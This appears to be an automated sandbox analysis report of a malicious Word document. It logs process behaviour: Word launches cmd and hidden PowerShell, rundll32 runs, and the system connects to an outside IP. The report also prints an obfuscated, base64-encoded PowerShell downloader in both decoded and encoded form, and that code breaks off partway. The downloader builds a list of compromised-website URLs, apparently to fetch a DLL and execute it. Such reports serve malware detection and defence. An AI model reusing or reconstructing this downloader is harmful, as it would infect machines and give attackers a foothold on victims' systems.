Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_001F109C FindFirstFileW,

13_2_001F109C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,

7_2_100011C0

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021C4FF mov eax, dword ptr fs:[00000030h]	7_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032C4FF mov eax, dword ptr fs:[00000030h]	8_2_0032C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FC4FF mov eax, dword ptr fs:[00000030h]	9_2_001FC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FC4FF mov eax, dword ptr fs:[00000030h]	10_2_001FC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EC4FF mov eax, dword ptr fs:[00000030h]	11_2_002EC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021C4FF mov eax, dword ptr fs:[00000030h]	12_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FC4FF mov eax, dword ptr fs:[00000030h]	13_2_001FC4FF

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

7_2_10001B30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_10007F07

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 5.2.136.90 80

Jump to behavior

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQA